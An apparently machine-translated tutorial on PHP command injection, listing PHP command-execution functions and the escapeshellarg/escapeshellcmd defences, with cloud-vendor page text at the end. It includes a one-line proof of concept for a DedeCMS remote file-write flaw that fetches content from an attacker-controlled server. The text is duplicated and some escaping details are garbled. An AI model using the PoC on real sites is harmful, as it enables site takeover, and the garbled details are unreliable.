command injection, that is, because the Web application is not strict with the data submitted by the user, the hacker can commit the data to the Web application by constructing a special command string, and execute an external program or system command to carry out the attack by using the method. Illegal access to data or network resources.
The main reason for the existence of the PHP command injection attack is that the Web application clerk, when applying some functions with command execution function in the PHP language, does not carry out strict filtering of the data content submitted by the user into the function. For example, when a hacker submits a data content that is written to a PHP file to a Web site directory, it is possible to write a PHP backdoor file through the command injection exploit, which further penetrates the attack.
The vulnerability and impact of a PHP command injection attack is serious. There are several ways to prevent the presence of a command injection attack vulnerability:
1. Try not to execute external applications or commands.
2. Use a custom function or library to implement the functionality of an external application or command.
3. Determine the contents of the parameters before performing functions such as system, eval, and other commands.
4. Use the Escapeshellarg function to process the relevant parameters. The Escapeshellarg function escapes any character that causes a parameter or command to end, such as the single quotation mark "'" is escaped as "\", and the double quotation mark "" "is escaped as" \ "", semicolon ";" is escaped as "\;", so that Escapeshellarg restricts the contents of the argument to a pair of single or double quotation marks, escaping the single or double quotation marks contained in the parameter, so that it cannot truncate the current execution, and for the purpose of preventing command injection attacks.
5. Execute the executable file path using Safe_mode_exec_dir. Set the Safe_mode in the php.ini file to on, then put the allowed files into a directory and use Safe_mode_exec_dir to specify the executable file path. This way, the program must be allowed to execute in the directory specified by Safe_mode_exec_dir when it is necessary to execute the appropriate external program, otherwise execution will fail.
PHP Command injection Attack vulnerability is one of the common vulnerabilities in PHP applications. Domestic well-known PHP applications, such as discuz!, DEDECMS and other large programs in the network have been published in the presence of command injection attack vulnerability, hackers can be injected through the command to quickly access the site permissions, and then implement the horse, fishing and other malicious attacks, resulting in a huge impact and harm. At the same time, the PHP language is applied to the Web application development of a large proportion, Web application staff should be aware of the threat of command injection attack vulnerability, patches may exist in the vulnerability of hackers exploited, to protect the security of network users from horse, fishing and other malicious code attacks
Use of command execution functions
In PHP, you can implement a command execution function that executes an external program or function, including the following 5 functions.
2.1 System functions
Can be used to execute an external application and output the corresponding execution result, the function prototype is as follows: String system (String command, int &return_var) where the command is to be executed, return_ var holds the status value after the execution of the command. According to the idea of a PHP programmer, the main function of a command execution function is to interact with a Web application through a command execution function, to execute external programs or system commands through a Web application, such as a Web application to obtain IP addresses, users, etc. through the system function. Then he can do it by constructing the following code. In the following code, a variable named $action is defined, whose value is the obtained CMD value, System ($action)), and $action is the system parameter, which is the command to execute. When we debug PHP, using Var_dump or Print_r to print data or arrays, HTML page does not wrap the display, see a lot of content, not good positioning, add <pre> before the output, you can automatically format line-wrapping display.
Enter "Http://localhost/test.php?cmd=ipconfig" in the browser address bar, when the value of CMD is assigned to ipconfig, the system function outputs the IP address information =
2.2 EXEC function
Can be used to execute an external application, the function prototype is as follows:
String exec (string $command [, Array & $output [, int & $return _var]]),
Where command is the order to execute, output is the string of each line that executes the command output, Return_var the state value after the command is executed.
2.3 PassThru function
Can be used to execute a system command and display the original output, when the output of the system command is binary data, and need to return the value directly to the browser, you need to use the PassThru function to replace the system and the EXEC function. The PassThru function is prototyped as follows:
void PassThru (String command, int &return_var),
Where command is the order to execute, Return_var holds the state value after the command is executed. You can test it by constructing the following PHP code.
2.4 Shell_exec function
Executes the shell command and returns the output string, the function prototype is as follows:
String shell_exec (String command),
Command
is the command to execute.
2.5 "anti-quote
The same as the Shell_exec function, executes the shell command and returns the output string.
2.6 Popen function
The Popen () function opens a process file pointer, which opens a pipeline to a process that is generated by the execution of the command commands that derive the specified. Returns a file pointer, except that it is one-way (read or write only) and must be closed with pclose (). If an error occurs, False is returned. The function is prototyped as follows: Popen (string $command, String $mode), where command is required to execute commands, mode specifies the connection mode, R is read only, and W is write-only.
2.7 Proc_open function
Used to execute a command, and open a file pointer for input/output. Similar to the Popen () function, but Proc_open () provides a more powerful program execution capability. The function prototypes are as follows:
Resource Proc_open (string $cmd, array $descriptorspec, array & $pipes [, String $cwd [, array $env [, array $other _ Options]])
2.8pcntl_exec function
The PCNTL_EXEC function executes the specified program in the current process space. Returns False when an error occurs, not returned when there is no error. The function is prototyped as follows: void Pcntl_exec (String $path [, array $args [, array $envs]]) where path must be an executable binary file path or a script that specifies an executable path header in the first line of the file; S is an array of strings to pass to the program's arguments; Envs is an array of strings to pass to the program as an environment variable. This array is the key = value format, and key represents the name of the environment variable to be passed, and value represents the value of the environment variable.
Defense function
When the user enters data as a function parameter, you can use the Escapeshellarg () or escapeshellcmd () function to filter the data entered by the user, preventing the user from tricking the system into executing arbitrary commands.
3.1 Escapeshellcmd () function
Removing a special symbol from a string escapes all shell metacharacters in the command to complete the work. These meta characters include: # &; ', | * ? ~ < > ^ () [] {} $ \. The function is prototyped as follows: String escapeshellcmd (String command). This function removes the special symbol in the string, which prevents the user from maliciously cracking the server system.
3.3 Escapeshellarg function
This function converts a string to a parameter that can be used in a shell command. Escapeshellarg () adds a single quotation mark to the string and can reference or transcode any existing single quotes, ensuring that a string is passed directly to the shell function and is safe. This function should be used for some parameters entered by the user. The security of PHP can be used to filter out some of the special characters that exist in Arg. The input parameters are filtered out if they are passed to Escapeshellarg in Chinese. The function is prototyped as follows: String Escapeshellarg (String $arg), where Arg is the parameter that needs to be transcoded.
Attached: dedecms remote Write file Vulnerability link (not related to this article knowledge point)
https://www.seebug.org/vuldb/ssvid-89354
Poc:
HTTP//target ip/install/index.php.bak?step=11&inslockfile=a&s_lang=a&install_demo_name=hello.php& updatehost=http://self-controlled HTTP server/
PHP Command injection Attack vulnerability is one of the common scripting vulnerabilities in PHP applications, and the domestic famous Web application discuz!, Dedecms and so on have existed this type of vulnerability.
command injection, that is, because the Web application is not strict with the data submitted by the user, the hacker can commit the data to the Web application by constructing a special command string, and execute an external program or system command to carry out the attack by using the method. Illegal access to data or network resources.
The main reason for the existence of the PHP command injection attack is that the Web application clerk, when applying some functions with command execution function in the PHP language, does not carry out strict filtering of the data content submitted by the user into the function. For example, when a hacker submits a data content that is written to a PHP file to a Web site directory, it is possible to write a PHP backdoor file through the command injection exploit, which further penetrates the attack.
The vulnerability and impact of a PHP command injection attack is serious. There are several ways to prevent the presence of a command injection attack vulnerability:
1. Try not to execute external applications or commands.
2. Use a custom function or library to implement the functionality of an external application or command.
3. Determine the contents of the parameters before performing functions such as system, eval, and other commands.
4. Use the Escapeshellarg function to process the relevant parameters. The Escapeshellarg function escapes any character that causes a parameter or command to end, such as the single quotation mark "'" is escaped as "\", and the double quotation mark "" "is escaped as" \ "", semicolon ";" is escaped as "\;", so that Escapeshellarg restricts the contents of the argument to a pair of single or double quotation marks, escaping the single or double quotation marks contained in the parameter, so that it cannot truncate the current execution, and for the purpose of preventing command injection attacks.
5. Execute the executable file path using Safe_mode_exec_dir. Set the Safe_mode in the php.ini file to on, then put the allowed files into a directory and use Safe_mode_exec_dir to specify the executable file path. This way, the program must be allowed to execute in the directory specified by Safe_mode_exec_dir when it is necessary to execute the appropriate external program, otherwise execution will fail.
PHP Command injection Attack vulnerability is one of the common vulnerabilities in PHP applications. Domestic well-known PHP applications, such as discuz!, DEDECMS and other large programs in the network have been published in the presence of command injection attack vulnerability, hackers can be injected through the command to quickly access the site permissions, and then implement the horse, fishing and other malicious attacks, resulting in a huge impact and harm. At the same time, the PHP language is applied to the Web application development of a large proportion, Web application staff should be aware of the threat of command injection attack vulnerability, patches may exist in the vulnerability of hackers exploited, to protect the security of network users from horse, fishing and other malicious code attacks
Use of command execution functions
In PHP, you can implement a command execution function that executes an external program or function, including the following 5 functions.
2.1 System functions
Can be used to execute an external application and output the corresponding execution result, the function prototype is as follows: String system (String command, int &return_var) where the command is to be executed, return_ var holds the status value after the execution of the command. According to the idea of a PHP programmer, the main function of a command execution function is to interact with a Web application through a command execution function, to execute external programs or system commands through a Web application, such as a Web application to obtain IP addresses, users, etc. through the system function. Then he can do it by constructing the following code. In the following code, a variable named $action is defined, whose value is the obtained CMD value, System ($action)), and $action is the system parameter, which is the command to execute. When we debug PHP, using Var_dump or Print_r to print data or arrays, HTML page does not wrap the display, see a lot of content, not good positioning, add <pre> before the output, you can automatically format line-wrapping display.
Enter "Http://localhost/test.php?cmd=ipconfig" in the browser address bar, when the value of CMD is assigned to ipconfig, the system function outputs the IP address information =
2.2 EXEC function
Can be used to execute an external application, the function prototype is as follows:
String exec (string $command [, Array & $output [, int & $return _var]]),
Where command is the order to execute, output is the string of each line that executes the command output, Return_var the state value after the command is executed.
2.3 PassThru function
Can be used to execute a system command and display the original output, when the output of the system command is binary data, and need to return the value directly to the browser, you need to use the PassThru function to replace the system and the EXEC function. The PassThru function is prototyped as follows:
void PassThru (String command, int &return_var),
Where command is the order to execute, Return_var holds the state value after the command is executed. You can test it by constructing the following PHP code.
2.4 Shell_exec function
Executes the shell command and returns the output string, the function prototype is as follows:
String shell_exec (String command), which is the command to execute.
2.5 "anti-quote
The same as the Shell_exec function, executes the shell command and returns the output string.
2.6 Popen function
The Popen () function opens a process file pointer, which opens a pipeline to a process that is generated by the execution of the command commands that derive the specified. Returns a file pointer, except that it is one-way (read or write only) and must be closed with pclose (). If an error occurs, False is returned. The function is prototyped as follows: Popen (string $command, String $mode), where command is required to execute commands, mode specifies the connection mode, R is read only, and W is write-only.
2.7 Proc_open function
Used to execute a command, and open a file pointer for input/output. Similar to the Popen () function, but Proc_open () provides a more powerful program execution capability. The function prototypes are as follows:
Resource Proc_open (string $cmd, array $descriptorspec, array & $pipes [, String $cwd [, array $env [, array $other _ Options]])
2.8pcntl_exec function
The PCNTL_EXEC function executes the specified program in the current process space. Returns False when an error occurs, not returned when there is no error. The function is prototyped as follows: void Pcntl_exec (String $path [, array $args [, array $envs]]) where path must be an executable binary file path or a script that specifies an executable path header in the first line of the file; S is an array of strings to pass to the program's arguments; Envs is an array of strings to pass to the program as an environment variable. This array is the key = value format, and key represents the name of the environment variable to be passed, and value represents the value of the environment variable.
Defense function
When the user enters data as a function parameter, you can use the Escapeshellarg () or escapeshellcmd () function to filter the data entered by the user, preventing the user from tricking the system into executing arbitrary commands.
3.1 Escapeshellcmd () function
Removing a special symbol from a string escapes all shell metacharacters in the command to complete the work. These meta characters include: # &; ', | * ? ~ < > ^ () [] {} $ \. The function is prototyped as follows: String escapeshellcmd (String command). This function removes the special symbol in the string, which prevents the user from maliciously cracking the server system.
3.3 Escapeshellarg function
This function converts a string to a parameter that can be used in a shell command. Escapeshellarg () adds a single quotation mark to the string and can reference or transcode any existing single quotes, ensuring that a string is passed directly to the shell function and is safe. This function should be used for some parameters entered by the user. The security of PHP can be used to filter out some of the special characters that exist in Arg. The input parameters are filtered out if they are passed to Escapeshellarg in Chinese. The function prototypes are as follows:
String Escapeshellarg (String $arg)
, where Arg is the parameter that needs to be transcoded.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
